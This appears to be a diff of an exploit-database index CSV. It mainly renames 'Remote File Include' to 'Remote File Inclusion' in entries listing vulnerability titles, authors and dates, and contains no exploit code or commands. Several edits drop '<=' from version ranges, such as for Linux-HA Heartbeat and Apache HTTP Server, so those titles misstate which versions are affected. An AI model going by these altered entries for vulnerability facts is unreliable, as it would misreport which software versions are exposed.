28368,platforms/multiple/remote/28368.txt,"ArcSoft Mms Composer 1.5.5/2.0 - Multiple Vulnerabilities",2006-08-09,"Collin R. Mulliner",multiple,remote,0 28369,platforms/windows/dos/28369.dpr,"IrfanView 3.98 ANI Image File Denial of Service",2006-08-09,sehato,windows,dos,0 -28370,platforms/php/webapps/28370.txt,"Mafia Moblog 6 Big.php Remote File Include",2006-08-10,sh3ll,php,webapps,0 +28370,platforms/php/webapps/28370.txt,"Mafia Moblog 6 Big.php Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0 28371,platforms/php/webapps/28371.txt,"YaBBSE 1.x Index.php Cross-Site Scripting",2006-08-10,O.U.T.L.A.W,php,webapps,0 -28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 Image Parameter Multiple Remote File Include Vulnerabilities",2006-08-10,x0r0n,php,webapps,0 +28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 Image Parameter Multiple Remote File Inclusion Vulnerabilities",2006-08-10,x0r0n,php,webapps,0 28373,platforms/windows/remote/28373.txt,"Panda ActiveScan 5.53 Ascan_6.ASP ActiveX Control Cross-Site Scripting",2006-08-10,Lostmon,windows,remote,0 28374,platforms/windows/remote/28374.txt,"IPCheck Server Monitor 5.x - Directory Traversal",2006-08-10,"Tassi Raeburn",windows,remote,0 28375,platforms/windows/dos/28375.pl,"TeraCopy 2.3 - (default.mo) Language File Integer Overflow",2013-09-18,LiquidWorm,windows,dos,0 28376,platforms/windows/remote/28376.html,"McKesson ActiveX File/Environmental Variable Enumeration",2013-09-18,blake,windows,remote,0 28377,platforms/php/webapps/28377.txt,"WordPress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload",2013-09-18,Vulnerability-Lab,php,webapps,0 -28378,platforms/php/webapps/28378.txt,"MyWebland miniBloggie 1.0 Fname Remote File Include",2006-08-10,sh3ll,php,webapps,0 -28379,platforms/php/webapps/28379.txt,"WEBinsta Mailing List Manager 1.3 Install3.php Remote File Include",2006-08-10,"Philipp Niedziela",php,webapps,0 +28378,platforms/php/webapps/28378.txt,"MyWebland miniBloggie 1.0 Fname Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0 +28379,platforms/php/webapps/28379.txt,"WEBinsta Mailing List Manager 1.3 Install3.php Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0 28380,platforms/linux/dos/28380.txt,"Mozilla Firefox 1.0.x JavaScript Handler Race Condition Memory Corruption",2006-08-12,"Michal Zalewski",linux,dos,0 28381,platforms/windows/dos/28381.txt,"Microsoft Windows XP/2000/2003 help - Multiple Vulnerabilities",2006-08-12,"Benjamin Tobias Franz",windows,dos,0 28382,platforms/php/webapps/28382.txt,"WP-DB Backup For WordPress 1.6/1.7 Edit.php - Directory Traversal",2006-08-14,"marc & shb",php,webapps,0 28383,platforms/linux/dos/28383.txt,"ImageMagick 6.x - .SGI Image File Remote Heap Buffer Overflow",2006-08-14,"Damian Put",linux,dos,0 28384,platforms/linux/dos/28384.txt,"Libmusicbrainz 2.0.2/2.1.x - Multiple Buffer Overflow Vulnerabilities",2006-08-14,"Luigi Auriemma",linux,dos,0 28385,platforms/asp/webapps/28385.txt,"BlaBla 4U Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,asp,webapps,0 -28386,platforms/linux/dos/28386.txt,"Linux-HA Heartbeat <= 2.0.6 - Remote Denial of Service",2006-08-13,"Yan Rong Ge",linux,dos,0 +28386,platforms/linux/dos/28386.txt,"Linux-HA Heartbeat 2.0.6 - Remote Denial of Service",2006-08-13,"Yan Rong Ge",linux,dos,0 28387,platforms/windows/dos/28387.html,"Microsoft Internet Explorer 6.0 IMSKDIC.DLL Denial of Service",2006-08-15,nop,windows,dos,0 -28388,platforms/php/webapps/28388.txt,"PHP-Nuke 2.0 AutoHTML Module Local File Include",2006-08-15,MosT3mR,php,webapps,0 +28388,platforms/php/webapps/28388.txt,"PHP-Nuke 2.0 AutoHTML Module Local File Inclusion",2006-08-15,MosT3mR,php,webapps,0 28389,platforms/windows/dos/28389.html,"Microsoft Internet Explorer 6.0 MSOE.DLL Denial of Service",2006-08-15,nop,windows,dos,0 -28390,platforms/php/webapps/28390.txt,"Lizge 20 - Index.php Multiple Remote File Include Vulnerabilities",2006-08-15,Crackers_Child,php,webapps,0 +28390,platforms/php/webapps/28390.txt,"Lizge 20 - Index.php Multiple Remote File Inclusion Vulnerabilities",2006-08-15,Crackers_Child,php,webapps,0 28391,platforms/linux/dos/28391.html,"Mozilla Firefox 1.x XML Handler Race Condition Memory Corruption",2006-08-15,"Michal Zalewski",linux,dos,0 28392,platforms/php/webapps/28392.txt,"Zen Cart Web Shopping Cart 1.x - autoload_func.php autoLoadConfig[999][0][loadFile] Parameter Remote File Inclusion",2006-08-15,"James Bercegay",php,webapps,0 28393,platforms/asp/webapps/28393.txt,"AspxCommerce 2.0 - Arbitrary File Upload",2013-09-19,SANTHO,asp,webapps,0 -28396,platforms/php/webapps/28396.txt,"Reporter 1.0 Mambo Component Reporter.sql.php Remote File Include",2006-08-16,Crackers_Child,php,webapps,0 +28396,platforms/php/webapps/28396.txt,"Reporter 1.0 Mambo Component Reporter.sql.php Remote File Inclusion",2006-08-16,Crackers_Child,php,webapps,0 28397,platforms/linux/remote/28397.sh,"GNU BinUtils 2.1x GAS Buffer Overflow",2006-08-17,"Tavis Ormandy",linux,remote,0 28398,platforms/linux/remote/28398.txt,"MySQL 4/5 SUID Routine Miscalculation Arbitrary DML Statement Execution",2006-08-17,"Michal Prokopiuk",linux,remote,0 28399,platforms/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,php,webapps,0 28400,platforms/windows/remote/28400.html,"Microsoft Internet Explorer 6.0 TSUserEX.DLL ActiveX Control Memory Corruption",2006-08-17,nop,windows,remote,0 28401,platforms/windows/dos/28401.html,"Microsoft Internet Explorer 6.0 Visual Studio COM Object Instantiation Denial of Service",2006-08-08,XSec,windows,dos,0 -28402,platforms/php/webapps/28402.txt,"Blog:CMS 4.1 Dir_Plugins Parameter Multiple Remote File Include Vulnerabilities",2006-08-17,Drago84,php,webapps,0 -28403,platforms/php/webapps/28403.txt,"Mambo LMTG Myhomepage 1.2 Component Multiple Remote File Include Vulnerabilities",2006-08-18,O.U.T.L.A.W,php,webapps,0 -28404,platforms/php/webapps/28404.txt,"Mambo Rssxt Component 1.0 MosConfig_absolute_path Multiple Remote File Include Vulnerabilities",2006-08-18,Crackers_Child,php,webapps,0 +28402,platforms/php/webapps/28402.txt,"Blog:CMS 4.1 Dir_Plugins Parameter Multiple Remote File Inclusion Vulnerabilities",2006-08-17,Drago84,php,webapps,0 +28403,platforms/php/webapps/28403.txt,"Mambo LMTG Myhomepage 1.2 Component Multiple Remote File Inclusion Vulnerabilities",2006-08-18,O.U.T.L.A.W,php,webapps,0 +28404,platforms/php/webapps/28404.txt,"Mambo Rssxt Component 1.0 MosConfig_absolute_path Multiple Remote File Inclusion Vulnerabilities",2006-08-18,Crackers_Child,php,webapps,0 28405,platforms/linux/local/28405.txt,"Roxio Toast 7 - DejaVu Component PATH Variable Local Privilege Escalation",2006-08-18,Netragard,linux,local,0 28406,platforms/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",php,webapps,0 28407,platforms/php/remote/28407.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote,0 28408,platforms/php/remote/28408.rb,"OpenEMR 4.1.1 Patch 14 - SQLi Privilege Escalation Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote,0 28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 (index.php onlyforuser param) - SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0 -28410,platforms/php/webapps/28410.txt,"Mambo Display MOSBot Manager Component mosConfig_absolute_path Remote File Include",2006-08-21,O.U.T.L.A.W,php,webapps,0 +28410,platforms/php/webapps/28410.txt,"Mambo Display MOSBot Manager Component mosConfig_absolute_path Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 28411,platforms/php/webapps/28411.txt,"DieselScripts Job Site Forgot.php Multiple Cross-Site Scripting Vulnerabilities",2006-08-21,night_warrior771,php,webapps,0 28412,platforms/php/webapps/28412.txt,"DieselScripts DieselPay Index.php Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0 28413,platforms/php/webapps/28413.txt,"cPanel 10.x dohtaccess.html dir Parameter XSS",2006-08-21,preth00nker,php,webapps,0 28414,platforms/php/webapps/28414.txt,"cPanel 10.x editit.html file Parameter XSS",2006-08-21,preth00nker,php,webapps,0 28415,platforms/php/webapps/28415.txt,"cPanel 10.x showfile.html file Parameter XSS",2006-08-21,preth00nker,php,webapps,0 -28416,platforms/php/webapps/28416.txt,"Mambo EstateAgent 1.0.2 Component mosConfig_absolute_path Remote File Include",2006-08-21,O.U.T.L.A.W,php,webapps,0 -28417,platforms/php/webapps/28417.txt,"ToendaCMS 0.x/1.0.x TCMS_Administer Parameter Remote File Include",2006-08-21,You_You,php,webapps,0 -28418,platforms/php/webapps/28418.txt,"PHProjekt Content Management Module 0.6.1 - Multiple Remote File Include Vulnerabilities",2006-08-21,"the master",php,webapps,0 -28419,platforms/php/webapps/28419.txt,"DieselScripts Smart Traffic Index.php Remote File Include",2006-08-21,night_warrior771,php,webapps,0 +28416,platforms/php/webapps/28416.txt,"Mambo EstateAgent 1.0.2 Component mosConfig_absolute_path Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 +28417,platforms/php/webapps/28417.txt,"ToendaCMS 0.x/1.0.x TCMS_Administer Parameter Remote File Inclusion",2006-08-21,You_You,php,webapps,0 +28418,platforms/php/webapps/28418.txt,"PHProjekt Content Management Module 0.6.1 - Multiple Remote File Inclusion Vulnerabilities",2006-08-21,"the master",php,webapps,0 +28419,platforms/php/webapps/28419.txt,"DieselScripts Smart Traffic Index.php Remote File Inclusion",2006-08-21,night_warrior771,php,webapps,0 28420,platforms/windows/dos/28420.htm,"Microsoft Windows 2000 - Multiple COM Object Instantiation Code Execution Vulnerabilities",2006-08-21,nop,windows,dos,0 28421,platforms/windows/dos/28421.htm,"Microsoft Internet Explorer 6.0 - Multiple COM Object Color Property Denial of Service Vulnerabilities",2006-08-21,XSec,windows,dos,0 28422,platforms/php/webapps/28422.txt,"DieselScripts Diesel Paid Mail Getad.php Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0 -28423,platforms/php/webapps/28423.txt,"RedBlog 0.5 Index.php Remote File Include",2006-08-22,Root3r_H3ll,php,webapps,0 -28424,platforms/linux/remote/28424.txt,"Apache HTTP Server <= 1.3.35 / <= 2.0.58 / <= 2.2.2 - Arbitrary HTTP Request Headers Security Weakness",2006-08-24,"Thiago Zaninotti",linux,remote,0 +28423,platforms/php/webapps/28423.txt,"RedBlog 0.5 Index.php Remote File Inclusion",2006-08-22,Root3r_H3ll,php,webapps,0 +28424,platforms/linux/remote/28424.txt,"Apache HTTP Server 1.3.35 / <= 2.0.58 / <= 2.2.2 - Arbitrary HTTP Request Headers Security Weakness",2006-08-24,"Thiago Zaninotti",linux,remote,0 28425,platforms/solaris/local/28425.txt,"Sun Solaris 8/9 UCB/PS Command Local Information Disclosure",2006-03-27,anonymous,solaris,local,0 -28426,platforms/php/webapps/28426.txt,"Headline Portal Engine 0.x/1.0 HPEInc Parameter Multiple Remote File Include Vulnerabilities",2006-08-21,"the master",php,webapps,0 +28426,platforms/php/webapps/28426.txt,"Headline Portal Engine 0.x/1.0 HPEInc Parameter Multiple Remote File Inclusion Vulnerabilities",2006-08-21,"the master",php,webapps,0 28427,platforms/novell/local/28427.pl,"Novell Identity Manager Arbitrary Command Execution",2006-08-18,anonymous,novell,local,0 28428,platforms/php/webapps/28428.txt,"Yapig 0.9x Thanks_comment.php Cross-Site Scripting",2006-10-13,Kuon,php,webapps,0 28429,platforms/php/webapps/28429.js,"MyBB 1.1.7 - Multiple HTML Injection Vulnerabilities",2006-08-26,Redworm,php,webapps,0 -28430,platforms/php/webapps/28430.txt,"Jupiter CMS 1.1.5 Index.php Remote File Include",2006-08-26,D3nGeR,php,webapps,0 -28431,platforms/php/webapps/28431.txt,"Jetbox CMS 2.1 - Search_function.php Remote File Include",2006-08-26,D3nGeR,php,webapps,0 +28430,platforms/php/webapps/28430.txt,"Jupiter CMS 1.1.5 Index.php Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0 +28431,platforms/php/webapps/28431.txt,"Jetbox CMS 2.1 - Search_function.php Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0 28432,platforms/php/webapps/28432.txt,"BigACE 1.8.2 item_main.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 28433,platforms/php/webapps/28433.txt,"BigACE 1.8.2 upload_form.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 28434,platforms/php/webapps/28434.txt,"BigACE 1.8.2 download.cmd.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 28435,platforms/php/webapps/28435.txt,"BigACE 1.8.2 admin.cmd.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 -28436,platforms/php/webapps/28436.txt,"AlstraSoft Video Share Enterprise 4.x MyajaxPHP.php Remote File Include",2006-08-26,night_warrior771,php,webapps,0 -28437,platforms/php/webapps/28437.txt,"Mambo/Joomla Com_comprofiler 1.0 Plugin.class.php Remote File Include",2006-08-26,Matdhule,php,webapps,0 +28436,platforms/php/webapps/28436.txt,"AlstraSoft Video Share Enterprise 4.x MyajaxPHP.php Remote File Inclusion",2006-08-26,night_warrior771,php,webapps,0 +28437,platforms/php/webapps/28437.txt,"Mambo/Joomla Com_comprofiler 1.0 Plugin.class.php Remote File Inclusion",2006-08-26,Matdhule,php,webapps,0 28438,platforms/windows/remote/28438.html,"Microsoft Internet Explorer 5.0.1 Daxctle.OCX Spline Method Heap Buffer Overflow",2006-08-28,XSec,windows,remote,0 28439,platforms/php/webapps/28439.txt,"HLstats 1.34 Hlstats.php Cross-Site Scripting",2006-08-29,kefka,php,webapps,0 -28440,platforms/php/webapps/28440.txt,"ModuleBased CMS - Multiple Remote File Include Vulnerabilities",2006-08-29,sCORPINo,php,webapps,0 +28440,platforms/php/webapps/28440.txt,"ModuleBased CMS - Multiple Remote File Inclusion Vulnerabilities",2006-08-29,sCORPINo,php,webapps,0 28441,platforms/php/webapps/28441.txt,"IwebNegar 1.1 Comments.php SQL Injection",2006-08-30,Hessam-x,php,webapps,0 28442,platforms/php/webapps/28442.txt,"LinksCaffe 2.0/3.0 - Authentication Bypass",2006-07-25,HoangYenXinhDep,php,webapps,0 28443,platforms/asp/webapps/28443.html,"Digiappz Freekot 1.01 ASP SQL Injection",2006-08-30,FarhadKey,asp,webapps,0 -28444,platforms/php/webapps/28444.txt,"AlstraSoft Template Seller - Config[Template_Path] Multiple Remote File Include Vulnerabilities",2006-08-30,night_warrior771,php,webapps,0 +28444,platforms/php/webapps/28444.txt,"AlstraSoft Template Seller - Config[Template_Path] Multiple Remote File Inclusion Vulnerabilities",2006-08-30,night_warrior771,php,webapps,0 28445,platforms/php/webapps/28445.txt,"MyBulletinBoard 1.x Functions_Post.php Cross-Site Scripting",2006-08-30,imei,php,webapps,0 28446,platforms/php/webapps/28446.txt,"HLstats 1.34 Index.php Multiple Cross-Site Scripting Vulnerabilities",2006-08-30,MC.Iglo,php,webapps,0 28447,platforms/php/webapps/28447.php,"OsCommerce 2.1/2.2 Product_info.php SQL Injection",2006-08-30,"James Bercegay",php,webapps,0 @@ -25506,8 +25506,8 @@ id,file,description,date,author,platform,type,port 28464,platforms/php/webapps/28464.txt,"VisualShapers EzContents 2.0.3 Headeruserdata.php SQL Injection",2006-08-30,DarkFig,php,webapps,0 28465,platforms/php/webapps/28465.txt,"VisualShapers EzContents 2.0.3 Loginreq2.php Cross-Site Scripting",2006-08-30,DarkFig,php,webapps,0 28466,platforms/php/webapps/28466.txt,"Learn.com Learncenter.ASP Cross-Site Scripting",2006-08-30,Crack_MaN,php,webapps,0 -28467,platforms/php/webapps/28467.txt,"ExBB 1.9.1 Home_Path Parameter Multiple Remote File Include Vulnerabilities",2006-08-31,Matdhule,php,webapps,0 -28468,platforms/php/webapps/28468.txt,"YACS 6.6.1 - Multiple Remote File Include Vulnerabilities",2006-09-01,MATASANOS,php,webapps,0 +28467,platforms/php/webapps/28467.txt,"ExBB 1.9.1 Home_Path Parameter Multiple Remote File Inclusion Vulnerabilities",2006-08-31,Matdhule,php,webapps,0 +28468,platforms/php/webapps/28468.txt,"YACS 6.6.1 - Multiple Remote File Inclusion Vulnerabilities",2006-09-01,MATASANOS,php,webapps,0 28450,platforms/hardware/remote/28450.py,"FiberHome Modem Router HG-110 - Authentication Bypass To Remote Change DNS Servers",2013-09-22,"Javier Perez",hardware,remote,0 28451,platforms/windows/dos/28451.txt,"Share KM 1.0.19 - Remote Denial of Service",2013-09-22,"Yuda Prawira",windows,dos,0 28452,platforms/php/webapps/28452.txt,"WordPress Lazy SEO plugin 1.1.9 - Shell Upload",2013-09-22,"Ashiyane Digital Security Team",php,webapps,0 @@ -25523,8 +25523,8 @@ id,file,description,date,author,platform,type,port 28462,platforms/php/webapps/28462.txt,"ezContents 2.0.3 - toprated.php GLOBALS[language_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28469,platforms/windows/dos/28469.txt,"Internet Security Systems 3.6 BlackICE - Local Denial of Service",2006-09-01,"David Matousek",windows,dos,0 28470,platforms/php/webapps/28470.txt,"VBZoom 1.11 Profile.php Cross-Site Scripting",2006-09-01,Crack_MaN,php,webapps,0 -28471,platforms/php/webapps/28471.txt,"ToendaCMS 0.x/1.0.x - Remote File Include",2006-09-01,h4ck3riran,php,webapps,0 -28472,platforms/php/webapps/28472.txt,"Papoo CMS 3.2 IBrowser Remote File Include",2006-09-01,Ironfist,php,webapps,0 +28471,platforms/php/webapps/28471.txt,"ToendaCMS 0.x/1.0.x - Remote File Inclusion",2006-09-01,h4ck3riran,php,webapps,0 +28472,platforms/php/webapps/28472.txt,"Papoo CMS 3.2 IBrowser Remote File Inclusion",2006-09-01,Ironfist,php,webapps,0 28473,platforms/php/webapps/28473.txt,"Autentificator 2.01 Aut_Verifica.Inc.php SQL Injection",2006-09-02,SirDarckCat,php,webapps,0 28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 - Multi-Egghunter shellcode",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0 28480,platforms/windows/remote/28480.rb,"CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow (2)",2013-09-23,Metasploit,windows,remote,6502 @@ -25533,9 +25533,9 @@ id,file,description,date,author,platform,type,port 28483,platforms/php/remote/28483.rb,"GLPI install.php Remote Command Execution",2013-09-23,Metasploit,php,remote,80 28484,platforms/hardware/remote/28484.rb,"Linksys WRT110 - Remote Command Execution",2013-09-23,Metasploit,hardware,remote,0 28485,platforms/php/webapps/28485.txt,"WordPress NOSpamPTI Plugin - Blind SQL Injection",2013-09-23,"Alexandro Silva",php,webapps,0 -28486,platforms/php/webapps/28486.txt,"In-Portal In-Link 2.3.4 ADODB_DIR.php Remote File Include",2006-09-04,"Saudi Hackrz",php,webapps,0 +28486,platforms/php/webapps/28486.txt,"In-Portal In-Link 2.3.4 ADODB_DIR.php Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0 28487,platforms/php/webapps/28487.txt,"PHP-Nuke MyHeadlines 4.3.1 Module Cross-Site Scripting",2006-09-04,"Thomas Pollet",php,webapps,0 -28488,platforms/php/webapps/28488.php,"PHP-Proxima 6.0 BB_Smilies.php Local File Include",2006-09-04,Kacper,php,webapps,0 +28488,platforms/php/webapps/28488.php,"PHP-Proxima 6.0 BB_Smilies.php Local File Inclusion",2006-09-04,Kacper,php,webapps,0 28489,platforms/windows/remote/28489.txt,"Easy Address Book Web Server 1.2 - Remote Format String",2006-09-04,"Revnic Vasile",windows,remote,0 28490,platforms/php/webapps/28490.txt,"SoftBB 0.1 Page Parameter Cross-Site Scripting",2006-09-05,ThE__LeO,php,webapps,0 28491,platforms/multiple/dos/28491.txt,"DSocks 1.3 Name Variable Buffer Overflow",2006-09-05,"Michael Adams",multiple,dos,0 @@ -25553,7 +25553,7 @@ id,file,description,date,author,platform,type,port 28503,platforms/php/webapps/28503.txt,"TextAds error.php error Parameter XSS",2006-09-09,s3rv3r_hack3r,php,webapps,0 28504,platforms/php/local/28504.php,"PHP 3-5 Ini_Restore() Safe_Mode and Open_Basedir Restriction Bypass",2006-09-09,"Maksymilian Arciemowicz",php,local,0 28505,platforms/php/webapps/28505.txt,"PHProg 1.0 - Multiple Input Validation Vulnerabilities",2006-09-11,cdg393,php,webapps,0 -29215,platforms/php/webapps/29215.txt,"FreeQBoard 1.0/1.1 QB_Path Parameter Multiple Remote File Include Vulnerabilities",2006-12-27,Shell,php,webapps,0 +29215,platforms/php/webapps/29215.txt,"FreeQBoard 1.0/1.1 QB_Path Parameter Multiple Remote File Inclusion Vulnerabilities",2006-12-27,Shell,php,webapps,0 28507,platforms/aix/local/28507.sh,"IBM AIX 6.1 / 7.1 - Local Privilege Escalation",2013-09-24,"Kristian Erik Hermansen",aix,local,0 28508,platforms/hardware/remote/28508.rb,"Raidsonic NAS Devices Unauthenticated Remote Command Execution",2013-09-24,Metasploit,hardware,remote,0 28510,platforms/php/webapps/28510.txt,"PHProg 1.0 index.php album Parameter XSS",2006-09-11,cdg393,php,webapps,0 @@ -25564,9 +25564,9 @@ id,file,description,date,author,platform,type,port 28515,platforms/php/webapps/28515.txt,"IDevSpot iSupport 1.8 rightbar.php suser Parameter XSS",2006-09-12,s3rv3r_hack3r,php,webapps,0 28516,platforms/php/webapps/28516.txt,"IDevSpot iSupport 1.8 open_tickets.php ticket_id Parameter XSS",2006-09-12,s3rv3r_hack3r,php,webapps,0 28517,platforms/php/webapps/28517.txt,"IDevSpot iSupport 1.8 index.php cons_page_title Parameter XSS",2006-09-12,s3rv3r_hack3r,php,webapps,0 -28518,platforms/php/webapps/28518.txt,"IDevSpot iSupport 1.8 Index.php Remote File Include",2006-09-12,s3rv3r_hack3r,php,webapps,0 -28519,platforms/php/webapps/28519.txt,"WM-News 0.5 Print.php Local File Include",2006-09-12,"Daftrix Security",php,webapps,0 -28520,platforms/php/webapps/28520.txt,"Ractive Popper 1.41 Childwindow.Inc.php Remote File Include",2006-09-12,SHiKaA,php,webapps,0 +28518,platforms/php/webapps/28518.txt,"IDevSpot iSupport 1.8 Index.php Remote File Inclusion",2006-09-12,s3rv3r_hack3r,php,webapps,0 +28519,platforms/php/webapps/28519.txt,"WM-News 0.5 Print.php Local File Inclusion",2006-09-12,"Daftrix Security",php,webapps,0 +28520,platforms/php/webapps/28520.txt,"Ractive Popper 1.41 Childwindow.Inc.php Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 28521,platforms/osx/dos/28521.txt,"Apple QuickTime 6/7 FLC Movie COLOR_64 Chunk Overflow",2006-09-12,Sowhat,osx,dos,0 28522,platforms/php/webapps/28522.txt,"Telekorn Signkorn Guestbook 1.x index.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 28523,platforms/php/webapps/28523.txt,"Telekorn Signkorn Guestbook 1.x includes/functions.gb.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 @@ -25603,7 +25603,7 @@ id,file,description,date,author,platform,type,port 28556,platforms/php/webapps/28556.txt,"e107 website system 0.7.5 user.php Query String (PATH_INFO) Parameter XSS",2006-09-13,zark0vac,php,webapps,0 28557,platforms/php/webapps/28557.txt,"X2CRM 3.4.1 - Multiple Vulnerabilities",2013-09-25,"High-Tech Bridge SA",php,webapps,80 28558,platforms/linux/webapps/28558.txt,"ZeroShell 'cgi-bin/kerbynet' - Local File Disclosure",2013-09-25,"Yann CAM",linux,webapps,0 -28658,platforms/php/webapps/28658.txt,"MyPhotos 0.1.3b Index.php Remote File Include",2006-09-23,Root3r_H3ll,php,webapps,0 +28658,platforms/php/webapps/28658.txt,"MyPhotos 0.1.3b Index.php Remote File Inclusion",2006-09-23,Root3r_H3ll,php,webapps,0 28659,platforms/palm_os/webapps/28659.txt,"Jamroom 3.0.16 Login.php Cross-Site Scripting",2006-09-24,meto5757,palm_os,webapps,0 28660,platforms/php/webapps/28660.php,"CPanel 5-10 - SUID Wrapper Remote Privilege Escalation",2006-09-24,"Nima Salehi",php,webapps,0 28560,platforms/php/webapps/28560.txt,"Piwigo 2.5.2 - Cross-Site Scripting",2013-09-26,Arsan,php,webapps,0 @@ -25616,13 +25616,13 @@ id,file,description,date,author,platform,type,port 28566,platforms/asp/webapps/28566.txt,"Snitz Forums 2000 Forum.ASP Cross-Site Scripting",2006-09-13,ajann,asp,webapps,0 28567,platforms/php/webapps/28567.txt,"NX5Linkx 1.0 - Multiple SQL Injection Vulnerabilities",2006-09-13,"Aliaksandr Hartsuyeu",php,webapps,0 28568,platforms/php/webapps/28568.txt,"NX5Linkx 1.0 Links.php HTTP Response Splitting",2006-09-13,"Aliaksandr Hartsuyeu",php,webapps,0 -28569,platforms/php/webapps/28569.txt,"ActiveCampaign KnowledgeBuilder 2.2 - Remote File Include",2006-09-14,igi,php,webapps,0 +28569,platforms/php/webapps/28569.txt,"ActiveCampaign KnowledgeBuilder 2.2 - Remote File Inclusion",2006-09-14,igi,php,webapps,0 28570,platforms/cgi/webapps/28570.txt,"Mailman 2.1.x - Multiple Input Validation Vulnerabilities",2006-09-14,"Moritz Naumann",cgi,webapps,0 28571,platforms/php/webapps/28571.txt,"DCP-Portal 6.0 admin/inc/footer.inc.php Multiple Parameter XSS",2006-09-14,"HACKERS PAL",php,webapps,0 28572,platforms/php/webapps/28572.txt,"DCP-Portal 6.0 admin/inc/header.inc.php Multiple Parameter XSS",2006-09-14,"HACKERS PAL",php,webapps,0 28573,platforms/php/webapps/28573.txt,"DCP-Portal 6.0 login.php username Parameter SQL Injection",2006-09-14,"HACKERS PAL",php,webapps,0 28574,platforms/php/webapps/28574.txt,"Blojsom 2.31 - Cross-Site Scripting",2006-09-14,"Avinash Shenoi",php,webapps,0 -28575,platforms/php/webapps/28575.txt,"PhotoPost Pro 4.6 - Multiple Remote File Include Vulnerabilities",2006-09-14,"Saudi Hackrz",php,webapps,0 +28575,platforms/php/webapps/28575.txt,"PhotoPost Pro 4.6 - Multiple Remote File Inclusion Vulnerabilities",2006-09-14,"Saudi Hackrz",php,webapps,0 28576,platforms/osx/local/28576.txt,"Apple Mac OS X 10.x KExtLoad Format String Weakness",2006-09-14,"Adriel T. Desautels",osx,local,0 28577,platforms/asp/webapps/28577.txt,"ClickBlog! 2.0 Default.ASP SQL Injection",2006-09-14,ajann,asp,webapps,0 28578,platforms/osx/dos/28578.txt,"Apple Mac OS X 10.x KExtLoad Buffer Overflow Weakness",2006-09-14,"Adriel T. Desautels",osx,dos,0 @@ -25637,11 +25637,11 @@ id,file,description,date,author,platform,type,port 28587,platforms/asp/webapps/28587.txt,"EasyPage 7 Default.ASPX SQL Injection",2006-09-15,s3rv3r_hack3r,asp,webapps,0 28588,platforms/windows/dos/28588.txt,"Symantec Multiple Products - SymEvent Driver Local Denial of Service",2006-09-15,"David Matousek",windows,dos,0 28589,platforms/asp/webapps/28589.txt,"Web Wiz Forums 7.01 Members.ASP Cross-Site Scripting",2006-09-15,Crack_MaN,asp,webapps,0 -28590,platforms/php/webapps/28590.txt,"Hitweb 3.0 REP_CLASS Multiple Remote File Include Vulnerabilities",2006-09-16,ERNE,php,webapps,0 +28590,platforms/php/webapps/28590.txt,"Hitweb 3.0 REP_CLASS Multiple Remote File Inclusion Vulnerabilities",2006-09-16,ERNE,php,webapps,0 28591,platforms/php/webapps/28591.php,"PHP-post Web Forum 0.x.1.0 profile.php Multiple Parameter SQL Injection",2006-09-16,"HACKERS PAL",php,webapps,0 28592,platforms/php/webapps/28592.txt,"PHP-post Web Forum 0.x.1.0 pm.php replyuser Parameter XSS",2006-09-16,"HACKERS PAL",php,webapps,0 28593,platforms/asp/webapps/28593.txt,"ZilekPortal 1.0 Haberdetay.ASP SQL Injection",2006-09-16,chernobiLe,asp,webapps,0 -28594,platforms/php/webapps/28594.txt,"Artmedic Links 5.0 Index.php Remote File Include",2006-09-16,botan,php,webapps,0 +28594,platforms/php/webapps/28594.txt,"Artmedic Links 5.0 Index.php Remote File Inclusion",2006-09-16,botan,php,webapps,0 28595,platforms/linux/remote/28595.txt,"BusyBox 1.01 HTTPD Directory Traversal",2006-09-16,bug-finder,linux,remote,0 28596,platforms/php/webapps/28596.txt,"MyBulletinBoard 1.2 Generic_Error.php Multiple Cross-Site Scripting Vulnerabilities",2006-09-18,"HACKERS PAL",php,webapps,0 28597,platforms/asp/webapps/28597.txt,"ECardPro 2.0 - Search.ASP SQL Injection",2006-09-18,ajann,asp,webapps,0 @@ -25662,7 +25662,7 @@ id,file,description,date,author,platform,type,port 28612,platforms/php/webapps/28612.txt,"RedBLoG 0.5 admin/config.php root_path Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 28613,platforms/php/webapps/28613.txt,"RedBLoG 0.5 common.php root_path Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 28614,platforms/php/webapps/28614.txt,"RedBLoG 0.5 admin/index.php root_path Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 -28615,platforms/asp/webapps/28615.txt,"DotNetNuke <= 4.0 HTML Injection",2006-09-17,"Secure Shapes",asp,webapps,0 